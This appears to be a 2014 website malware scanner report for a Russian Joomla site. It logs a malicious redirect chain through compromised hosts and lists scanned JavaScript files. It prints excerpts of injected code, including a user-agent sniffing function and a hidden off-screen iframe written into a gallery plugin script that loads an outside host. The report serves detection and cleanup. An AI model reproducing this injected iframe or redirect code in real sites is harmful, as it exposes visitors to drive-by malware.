Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://kartexpert.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: kartexpert.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:10 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: Apache/2.2.15 (Red Hat) mod_rpaf/0.6 PHP/5.3.27 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from turbine6.ht-systems.ru X-Cache-Lookup: MISS from turbine6.ht-systems.ru:6666 X-Powered-By: PHP/5.3.27 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:10 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:11 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:11 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://kartexpert.ru/ | 200 OK Content-Length: 51018 Content-Type: text/html | clean |
http://kartexpert.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97281 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below): function Nintendo() {
var g = navigator.userAgent; var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph [… excerpt truncated in the report; a later fragment of the same file follows …] return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://kartexpert.ru/media/system/js/core.js | 200 OK Content-Length: 5703 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below): function Nintendo() {
var g = navigator.userAgent; var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph [… excerpt truncated in the report; a later fragment of the same file follows …] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://kartexpert.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 239248 Content-Type: text/javascript | clean |
http://kartexpert.ru/media/system/js/caption.js | 200 OK Content-Length: 1648 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below): function Nintendo() {
var g = navigator.userAgent; var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph [… excerpt truncated in the report; a later fragment of the same file follows …] ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://kartexpert.ru/plugins/system/jat3/jat3/base-themes/default/js/core.js | 200 OK Content-Length: 6804 Content-Type: text/javascript | clean |
http://kartexpert.ru/plugins/system/jat3/jat3/base-themes/default/js/menu/mega.js | 200 OK Content-Length: 17179 Content-Type: text/javascript | clean |
http://kartexpert.ru/modules/mod_news_pro_gk4/interface/scripts/engine.js | 200 OK Content-Length: 8523 Content-Type: text/javascript | clean |
http://kartexpert.ru/media/system/js/modal.js | 200 OK Content-Length: 10474 Content-Type: text/javascript | clean |
http://kartexpert.ru/plugins/content/jw_sigpro/jw_sigpro/includes/js/mootools_slimbox/slimbox-1.71a/js/slimbox.js | 200 OK Content-Length: 4627 Content-Type: text/javascript | clean |
http://kartexpert.ru/plugins/content/jw_sigpro/jw_sigpro/includes/js/behaviour.js | 200 OK Content-Length: 1524 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below): var SIGProHelper = { ieBrowserDetect: function(){ if(!document.getElementsByTagName) return false; if(!document.getElementById) return false; var bodyClass = document.getElementsByTagName("body")[0].className; var isIE6 = navigator.userAgent.toLowerCase().indexOf('msie 6') != -1; var isIE7 = navigator.userAgent.toLowerCase().indexOf('msie 7') != -1; var isIE8 = navigator.userAgent.toLowerCase().indexOf('msie 8') != -1; if(isIE6) document.getElements [… excerpt truncated in the report; a later fragment of the same file follows …] if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } }; SIGProHelper.loader(SIGProHelper.ieBrowserDetect); ;;;;;;;document.write('<iframe src="http://juke.erstehilfe.ch/oaczz.ixVedwC6jZ?default" name="Hemoner" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>'); Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://kartexpert.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 1000 Content-Type: text/javascript | clean |
http://kartexpert.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 10432 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?2833107 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kartexpert.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kartexpert.ru/
Result: kartexpert.ru is not infected or malware details are not published yet.
Result: kartexpert.ru is not infected or malware details are not published yet.